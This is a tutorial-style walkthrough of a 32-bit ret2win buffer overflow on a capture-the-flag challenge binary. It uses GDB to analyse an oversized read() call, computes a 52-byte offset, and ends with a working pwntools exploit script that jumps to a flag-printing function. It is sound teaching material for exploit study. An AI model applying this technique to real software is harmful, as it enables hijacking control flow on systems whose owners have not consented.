Try a 32-bit overflow! This works the same way as the 64-bit one, but addresses get packed using p32 instead of p64.
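To make the difference concrete, here is a minimal sketch that uses Python's standard struct module as a stand-in for p32 and p64 with their default little-endian setting. The helper names pack32 and pack64 are hypothetical, and the example value is the address of win that shows up later in this walkthrough.

```python
import struct

def pack32(value: int) -> bytes:
    """Pack an unsigned 32-bit integer as 4 little-endian bytes."""
    return struct.pack("<I", value)

def pack64(value: int) -> bytes:
    """Pack an unsigned 64-bit integer as 8 little-endian bytes."""
    return struct.pack("<Q", value)

addr = 0x08049196  # assumption: the address of win found later in this writeup

packed32 = pack32(addr)
packed64 = pack64(addr)
print(len(packed32), packed32)  # 4 bytes, least significant byte first
print(len(packed64), packed64)  # 8 bytes, padded with zero bytes
```

On a 32-bit target the return pointer is only 4 bytes wide, so the 8-byte form would spill 4 extra zero bytes onto the stack.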
If you look at the challenge solution, it uses an old version of the challenge. That version reads input with gets(), which is unrealistic because every modern compiler strongly warns against using it. The modernized version uses read(), a system call that many real-life binaries use.
Same challenge, different architecture.
Let's start with the first security check, using checksec.
    [*] '/ironforge/chall'
        Arch:     i386-32-little
        RELRO:    Partial RELRO
        Stack:    No canary found
        NX:       NX enabled
        PIE:      No PIE (0x8048000)
The first and probably most important thing is that this is a 32-bit binary. This means that parameters are passed on the stack. When the call instruction is reached, the top of the stack holds the first parameter, the next slot down holds the second parameter, and so on.
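A minimal sketch of that ordering, assuming the cdecl convention that 32-bit Linux binaries normally use. The helper push_args_cdecl is hypothetical, and the example values are the read() arguments that appear later in this walkthrough.

```python
def push_args_cdecl(stack, *args):
    """Push arguments right-to-left, as a cdecl caller does before `call`.

    Index 0 of the list models the top of the stack (the lowest address).
    """
    for arg in reversed(args):
        stack.insert(0, arg)
    return stack

# Models read(0, buf, 0x40); 0xffffce88 is the buffer address seen later in GDB.
stack = push_args_cdecl([], 0x0, 0xffffce88, 0x40)

for i, word in enumerate(stack):
    print(f"[esp+{4 * i:#x}] = {word:#010x}  (parameter {i + 1})")
```

The last argument is pushed first, which is why the first parameter ends up on top.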
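We see that the protections that matter here are disabled: there is no stack canary and no PIE. NX is enabled, but that does not get in our way because we will reuse code that is already in the binary instead of injecting our own. The most important check for the buffer overflow is that the canary is disabled.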
Let's go into GDB and find where this function takes input. Inside read_in:
    0x080491fc <+59>: push 0x40
    0x080491fe <+61>: lea eax,[ebp-0x30]
    0x08049201 <+64>: push eax
    0x08049202 <+65>: push 0x0
    0x08049204 <+67>: call 0x8049040 <read@plt>
We see that this program uses read for input. The man page says this about read:
    SYNOPSIS
        #include <unistd.h>

        ssize_t read(int fd, void buf[.count], size_t count);

    DESCRIPTION
        read() attempts to read up to count bytes from file descriptor fd
        into the buffer starting at buf.
In this case, the buffer handed to read starts at ebp-0x30, so it has at most 0x30 bytes of space before it runs into the saved base pointer, yet read allows the user to write 0x40 bytes. This is a buffer overflow vulnerability, and it is the one we are going to exploit.
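The arithmetic behind that claim can be sketched as follows. The two constants come straight from the disassembly above; the layout (saved base pointer at ebp, return pointer at ebp+4) is the standard 32-bit frame layout, and the variable names are illustrative.

```python
BUF_OFFSET_FROM_EBP = -0x30  # from: lea eax,[ebp-0x30]
READ_COUNT = 0x40            # from: push 0x40
WORD = 4                     # size of a pointer on i386

# Distance from the start of the buffer to each saved value.
saved_ebp_off = -BUF_OFFSET_FROM_EBP  # saved base pointer lives at [ebp]
ret_addr_off = saved_ebp_off + WORD   # return pointer lives at [ebp+4]

# The return pointer is fully overwritable if its last byte is within reach.
can_overwrite_ret = ret_addr_off + WORD <= READ_COUNT

print(f"saved ebp at buffer+{saved_ebp_off}")
print(f"return pointer at buffer+{ret_addr_off}")
print(f"read() can write {READ_COUNT} bytes, overwrite possible: {can_overwrite_ret}")
```

The 0x40-byte limit leaves 8 bytes to spare after the return pointer, which is enough for this exploit.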
Now that both vulnerability prerequisites have been checked (no canary, and an input that can overrun its buffer), let's start figuring out how to execute the buffer overflow.
Let's do our analysis in GDB as if we didn't have the source code (because, typically, we won't), and only refer to the source to explain why things happen.
First, we check the functions available:
    gef➤ info functions
    All defined functions:

    Non-debugging symbols:
    0x08049000 _init
    0x08049030 __libc_start_main@plt
    0x08049040 read@plt
    0x08049050 fflush@plt
    0x08049060 puts@plt
    0x08049070 system@plt
    0x08049080 _start
    0x080490ad __wrap_main
    0x080490c0 _dl_relocate_static_pie
    0x080490d0 __x86.get_pc_thunk.bx
    0x080490e0 deregister_tm_clones
    0x08049120 register_tm_clones
    0x08049160 __do_global_dtors_aux
    0x08049190 frame_dummy
    0x08049196 win
    0x080491c1 read_in
    0x08049212 main
    0x08049252 __x86.get_pc_thunk.ax
    0x08049258 _fini
The three functions that we are interested in are win, read_in, and main. win logically appears to be the target, so let's figure out what happens there:
    gef➤ disas win
    Dump of assembler code for function win:
    0x08049196 <+0>: push ebp
    0x08049197 <+1>: mov ebp,esp
    0x08049199 <+3>: push ebx
    0x0804919a <+4>: sub esp,0x4
    0x0804919d <+7>: call 0x8049252 <__x86.get_pc_thunk.ax>
    0x080491a2 <+12>: add eax,0x2e52
    0x080491a7 <+17>: sub esp,0xc
    0x080491aa <+20>: lea edx,[eax-0x1fec]
    0x080491b0 <+26>: push edx
    0x080491b1 <+27>: mov ebx,eax
    0x080491b3 <+29>: call 0x8049070 <system@plt>
    0x080491b8 <+34>: add esp,0x10
    0x080491bb <+37>: nop
    0x080491bc <+38>: mov ebx,DWORD PTR [ebp-0x4]
    0x080491bf <+41>: leave
    0x080491c0 <+42>: ret
win makes a call to system, which the man page says takes a char* (string) argument. From the source code, we see that the argument is "cat flag.txt", meaning that it prints the contents of the flag file.
Because the flag is read from flag.txt at run time, running strings on the binary is not enough to find the flag.
Now, let's check main:
    gef➤ disas main
    Dump of assembler code for function main:
    0x08049212 <+0>: lea ecx,[esp+0x4]
    0x08049216 <+4>: and esp,0xfffffff0
    0x08049219 <+7>: push DWORD PTR [ecx-0x4]
    0x0804921c <+10>: push ebp
    0x0804921d <+11>: mov ebp,esp
    0x0804921f <+13>: push ebx
    0x08049220 <+14>: push ecx
    0x08049221 <+15>: call 0x80490d0 <__x86.get_pc_thunk.bx>
    0x08049226 <+20>: add ebx,0x2dce
    0x0804922c <+26>: call 0x80491c1 <read_in>
    0x08049231 <+31>: sub esp,0xc
    0x08049234 <+34>: lea eax,[ebx-0x1fb8]
    0x0804923a <+40>: push eax
    0x0804923b <+41>: call 0x8049060 <puts@plt>
    0x08049240 <+46>: add esp,0x10
    0x08049243 <+49>: mov eax,0x0
    0x08049248 <+54>: lea esp,[ebp-0x8]
    0x0804924b <+57>: pop ecx
    0x0804924c <+58>: pop ebx
    0x0804924d <+59>: pop ebp
    0x0804924e <+60>: lea esp,[ecx-0x4]
    0x08049251 <+63>: ret
We see that main just appears to call read_in and then return. So, let's go check read_in:
    Dump of assembler code for function read_in:
    0x080491c1 <+0>: push ebp
    0x080491c2 <+1>: mov ebp,esp
    0x080491c4 <+3>: push ebx
    0x080491c5 <+4>: sub esp,0x34
    0x080491c8 <+7>: call 0x80490d0 <__x86.get_pc_thunk.bx>
    0x080491cd <+12>: add ebx,0x2e27
    0x080491d3 <+18>: sub esp,0xc
    0x080491d6 <+21>: lea eax,[ebx-0x1fdc]
    0x080491dc <+27>: push eax
    0x080491dd <+28>: call 0x8049060 <puts@plt>
    0x080491e2 <+33>: add esp,0x10
    0x080491e5 <+36>: mov eax,DWORD PTR [ebx-0x4]
    0x080491eb <+42>: mov eax,DWORD PTR [eax]
    0x080491ed <+44>: sub esp,0xc
    0x080491f0 <+47>: push eax
    0x080491f1 <+48>: call 0x8049050 <fflush@plt>
    0x080491f6 <+53>: add esp,0x10
    0x080491f9 <+56>: sub esp,0x4
    0x080491fc <+59>: push 0x40
    0x080491fe <+61>: lea eax,[ebp-0x30]
    0x08049201 <+64>: push eax
    0x08049202 <+65>: push 0x0
    0x08049204 <+67>: call 0x8049040 <read@plt>
    0x08049209 <+72>: add esp,0x10
    0x0804920c <+75>: nop
    0x0804920d <+76>: mov ebx,DWORD PTR [ebp-0x4]
    0x08049210 <+79>: leave
    0x08049211 <+80>: ret
We see that this is where read() is called and where we will overflow the buffer. We also notice that malloc() is never called (it does not even appear in the function list), meaning that the data is not being placed on the heap.
To confirm this, we check what's being passed to read(). Let's set a breakpoint right before the call to read() and check:
    gef➤ x/3wx $esp
    0xffffce70: 0x00000000 0xffffce88 0x00000040
x/3wx $esp (or pxw @ esp in radare2) shows the 3 values on the top of the stack. In 32-bit, this is how we pass parameters. This shows that 0xffffce88 is being passed as the second parameter to read(), which is the address of the buffer.
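As a quick sanity check, the three words can be matched against the read(fd, buf, count) signature from the man page. This is only an illustrative sketch that parses the single GDB output line shown above; the variable names are made up for the example.

```python
# The line printed by `x/3wx $esp` right before the call to read().
line = "0xffffce70: 0x00000000 0xffffce88 0x00000040"

addr_text, words_text = line.split(":")
esp = int(addr_text, 16)

# Top of stack first: read(fd, buf, count)
fd, buf, count = (int(word, 16) for word in words_text.split())

print(f"esp   = {esp:#x}")
print(f"fd    = {fd} (0 is standard input)")
print(f"buf   = {buf:#x} ({buf - esp} bytes above esp)")
print(f"count = {count:#x} ({count} bytes)")
```

The buffer sits only 0x18 bytes above the stack pointer, which already hints at where it lives.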
Something peculiar that we notice is that 0xffffce88 (the location we're writing to) is close to the stack pointer (0xffffce70). Are we writing to the stack? The short answer is yes, but let's confirm. Run info proc mappings or vmmap (dm in radare2) to check the bounds of the various memory segments:
    gef➤ vmmap 0xffffce88
    [ Legend: Code | Heap | Stack ]
    Start      End        Offset     Perm Path
    0xfffdd000 0xffffe000 0x00000000 rw- [stack]
We see that our stack is located between 0xfffdd000 and 0xffffe000. Our buffer address is inside this range, meaning we are writing to the stack.
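The same range check can be written out explicitly. This sketch parses the one mapping row printed by vmmap above; the variable names are illustrative.

```python
# The single row vmmap printed for the buffer address.
row = "0xfffdd000 0xffffe000 0x00000000 rw- [stack]"

start_text, end_text, _offset, perms, name = row.split()
start, end = int(start_text, 16), int(end_text, 16)

buf = 0xffffce88  # second argument to read(), taken from the stack
in_stack = start <= buf < end

print(f"{buf:#x} inside {name}: {in_stack}")
print(f"permissions: {perms}")  # no 'x': consistent with NX being enabled
```

The missing execute permission is the NX protection from checksec, which is why the plan is to jump to existing code rather than to bytes we place on the stack.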
Remember that read() was told to accept up to 0x40 bytes, more than the buffer can hold, and nothing checks that the input fits? There are some important things on the stack right now, so let's go check them out.
    gef➤ x/20wx $esp
    0xffffce70: 0x00000000 0xffffce88 0x00000040 0x080491cd
    0xffffce80: 0xf7ffcfd8 0x00000028 0x00000000 0xffffdfa9
    0xffffce90: 0xf7fc8570 0xf7fc8000 0x00000000 0x00000000
    0xffffcea0: 0x00000000 0x00000000 0x00000000 0x00000000
    0xffffceb0: 0xffffffff 0x0804bff4 0xffffcec8 0x08049231
This looks like a lot of gibberish, but two numbers stand out in particular:
    gef➤ x/wx 0xffffce7c
    0xffffce7c: 0x080491cd
    gef➤ x/wx 0xffffcebc
    0xffffcebc: 0x08049231
Why these two? The short answer is that they look different from the values around them! If we check info proc mappings again, we see:
    gef➤ vmmap 0x080491cd 0x08049231
    [ Legend: Code | Heap | Stack ]
    Start      End        Offset     Perm Path
    0x08049000 0x0804a000 0x00001000 r-x /ironforge/chall
This is executable memory located inside the challenge binary. This is the text segment. This means that these values are addresses in the code. Let's check what's there:
    gef➤ x/i 0x080491cd
    0x80491cd <read_in+12>: add ebx,0x2e27
    gef➤ x/i 0x08049231
    0x8049231 <main+31>: sub esp,0xc
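We see that these both point to instructions. The first one points to somewhere near the top of read_in, and the second one back into main. The first one is a stale return address: the call to __x86.get_pc_thunk.bx at read_in+7 pushed the address of the next instruction (read_in+12), and nothing has overwritten it since. The second one is the return pointer that takes read_in back to main. The saved base pointer (ebp) is the word right before it, 0xffffcec8 at 0xffffceb8.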
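Spotting those two values by eye can also be done mechanically. The sketch below scans the x/20wx dump for words that fall inside the text segment range reported by vmmap; find_code_pointers is a hypothetical helper written for this example.

```python
# Output of `x/20wx $esp`, copied from the GDB session above.
dump = """\
0xffffce70: 0x00000000 0xffffce88 0x00000040 0x080491cd
0xffffce80: 0xf7ffcfd8 0x00000028 0x00000000 0xffffdfa9
0xffffce90: 0xf7fc8570 0xf7fc8000 0x00000000 0x00000000
0xffffcea0: 0x00000000 0x00000000 0x00000000 0x00000000
0xffffceb0: 0xffffffff 0x0804bff4 0xffffcec8 0x08049231
"""

# Text segment bounds reported by vmmap.
TEXT_START, TEXT_END = 0x08049000, 0x0804a000

def find_code_pointers(dump_text, lo, hi):
    """Return (stack_address, value) pairs whose value lies in [lo, hi)."""
    hits = []
    for line in dump_text.strip().splitlines():
        base_text, words_text = line.split(":")
        base = int(base_text, 16)
        for i, word_text in enumerate(words_text.split()):
            word = int(word_text, 16)
            if lo <= word < hi:
                hits.append((base + 4 * i, word))
    return hits

hits = find_code_pointers(dump, TEXT_START, TEXT_END)
for stack_addr, value in hits:
    print(f"{stack_addr:#x}: {value:#010x}")
```

Note that 0x0804bff4 is not reported: it belongs to the binary but lies outside the executable mapping, so it cannot be a return address.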
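Let's understand how this happened.
When a function is called, the following happens:
The call instruction pushes the return pointer (the address of the next instruction in the caller) onto the stack and jumps to the function.
The function prologue then saves the caller's base pointer, starts a new stack frame, and subtracts from the stack pointer to make room for local variables:
    Dump of assembler code for function read_in:
    0x080491c1 <+0>: push ebp
    0x080491c2 <+1>: mov ebp,esp
    0x080491c4 <+3>: push ebx
    0x080491c5 <+4>: sub esp,0x34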
When the function returns, the following happens:
    0x0804920c <+75>: nop
    0x0804920d <+76>: mov ebx,DWORD PTR [ebp-0x4]
    0x08049210 <+79>: leave
    0x08049211 <+80>: ret
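leave is shorthand for mov esp, ebp ; pop ebp. This returns the base and stack pointers to the values they had before the prologue modified them, which resets the stack frame to that of the calling function.
ret pops the return pointer off the stack and jumps to it (effectively pop eip).
How do we leverage this?
In read_in, we subtract from the stack pointer to make room for the buffer, so the buffer sits at a lower address than the saved base pointer and the return pointer. Writing past the end of the buffer overwrites both, and ret will then jump to whatever value we put in place of the return pointer.
Let's make this happen.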
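Before doing so, the effect of the leave and ret instructions can be modelled in a few lines. This is a toy simulation, not a real emulator: run_epilogue is a hypothetical helper, memory is a plain dictionary, and the addresses are the ones from the GDB session (ebp is 0xffffceb8 because the buffer at 0xffffce88 is ebp-0x30).

```python
def run_epilogue(memory, ebp):
    """Model `leave ; ret` on a dict mapping stack address -> 32-bit word."""
    esp = ebp          # leave, part 1: mov esp, ebp
    ebp = memory[esp]  # leave, part 2: pop ebp
    esp += 4
    eip = memory[esp]  # ret: pop the return pointer into eip
    esp += 4
    return eip, ebp, esp

EBP = 0xffffceb8

# The frame as GDB showed it: saved base pointer, then return pointer.
intact = {0xffffceb8: 0xffffcec8, 0xffffcebc: 0x08049231}

# The same two slots after an overflow replaced them with attacker data.
smashed = {0xffffceb8: 0x41414141, 0xffffcebc: 0x08049196}

eip_intact, _, _ = run_epilogue(intact, EBP)
eip_smashed, ebp_smashed, _ = run_epilogue(smashed, EBP)

print(f"normal return goes to   {eip_intact:#010x} (main+31)")
print(f"smashed return goes to  {eip_smashed:#010x} (win)")
print(f"ebp after smashed leave {ebp_smashed:#010x} (four 'A' bytes)")
```

The base pointer ends up as garbage too, which is harmless here because win sets up its own frame.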
We are still at the breakpoint on the call to read(). Let's check the stack again:
    gef➤ x/3wx $esp
    0xffffce70: 0x00000000 0xffffce88 0x00000040
The second value, 0xffffce88, is the address we are going to write to. As a reminder, this is where we found the return pointer:
    gef➤ x/wx $esp+0x4c
    0xffffcebc: 0x08049231
This means that in order to reach the return pointer, we need to fill everything from 0xffffce88 up to 0xffffcebc. How many bytes is this? Let's get some Python practice:
    gef➤ !python3 -c "print(0xffffcebc-0xffffce88)"
    52
This means that we need to write 52 bytes of padding, and then the next 4 bytes overwrite the return pointer. But where do we want to go? The win function! Let's get that address:
    gef➤ info functions win
    All functions matching regular expression "win":

    Non-debugging symbols:
    0x08049196 win
Let's use Python to make this a payload:
    $ python3 -c "print('A' * 52 + str(0x08049196))"
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA134517142
And what happens when we run this?
    $ ./win32
    Can you figure out how to win here?
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA134517142
    Segmentation fault (core dumped)
We… crashed. What does that mean? It means we either corrupted memory or tried to execute memory that we weren't allowed to. Let's retry this in GDB and watch the execution:
    [#0] Id 1, Name: "win32", stopped 0x35343331 in ?? (), reason: SINGLE STEP
It's saying that it reached the address 0x35343331 and stopped. What does this mean?
We redirected execution, but not to the win function. We need to figure out what happened.
Let's dive deeper into what is happening here:
0x35343331 is the bytes 0x35 0x34 0x33 0x31, the ASCII codes for 5431. Reversed, that is 1345, the first four characters after the padding in our payload. It appears backward because the binary is little-endian.
134517142 is the decimal representation of 0x08049196, the address of win. str() turned the address into nine ASCII digits instead of four raw bytes.
How can we get the address to appear as raw bytes in the payload?
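The mix-up can be reproduced without running the binary. This sketch uses the standard struct module and the address of win reported by info functions; it shows what the text form of the address looks like in memory and which address the CPU would read from it.

```python
import struct

win = 0x08049196  # address of win reported by `info functions win`

as_text = str(win).encode()        # what str() puts in the payload: ASCII digits
as_bytes = struct.pack("<I", win)  # what the return pointer actually needs

# The CPU reads the first four bytes after the padding as a little-endian word.
crashed_at = struct.unpack("<I", as_text[:4])[0]

print(as_text, "->", hex(crashed_at))
print(as_bytes)
```

The first four ASCII digits decode to 0x35343331, the exact address GDB reported, while the packed form is the four bytes 96 91 04 08.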
This is where pwntools comes in. Pwntools has packing functions that convert a number into bytes of the correct size and byte order. It also gives us a way to send this payload to the binary. Consider the following exploit:
    from pwn import *

    p = process("./chall")
    payload = b"A" * 52
    payload += p32(0x08049196)
    p.sendline(payload)
    p.interactive()
Let's break this exploit down:
from pwn import * -- This imports the pwntools library into the program, just like an #include in C-type languages.
p = process("./chall") -- This creates a process object that runs the chall binary.
payload = b"A" * 52 -- This creates a variable containing 52 bytes of A characters. Note that you could use any characters, but A (0x41) is a common choice.
payload += p32(0x08049196) -- This packs 0x08049196 (the address of win) as a 32-bit little-endian byte string. This is appended to our padding.
p.sendline(payload) -- This sends the payload to the process.
p.interactive() -- This allows us to interact with the process after sending the payload.
Let's run this exploit:
    $ python3 asd.py
    [+] Starting local process './chall': pid 777254
    [*] Switching to interactive mode
    Can you figure out how to win here?
    IFC{PL4C3H0LD3R_FL4G_H3R3!}
    [*] Got EOF while reading in interactive
    $
    [*] Process './chall' stopped with exit code -11 (SIGSEGV) (pid 777254)
    [*] Got EOF while sending in interactive
We have our flag!
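For readers who want to inspect the payload without pwntools installed, it can be rebuilt with only the standard library. This is a sketch under the same assumptions as the exploit above (52 bytes of padding, win at 0x08049196); build_payload is a hypothetical helper, not part of pwntools.

```python
import struct

def build_payload(offset: int, target: int, pad: bytes = b"A") -> bytes:
    """Padding up to the return pointer, then the target as 4 little-endian bytes."""
    return pad * offset + struct.pack("<I", target)

payload = build_payload(52, 0x08049196)

# read() accepts at most 0x40 bytes, so the payload plus a newline must fit.
fits = len(payload) + 1 <= 0x40

print(len(payload), "bytes, fits in read():", fits)
print(payload.hex())

# To send it by hand, something like this should work in place of pwntools:
#   import subprocess
#   subprocess.run(["./chall"], input=payload + b"\n")
```

The SIGSEGV in the output above is expected: after win returns, execution continues at whatever happens to follow the overwritten return pointer on the stack.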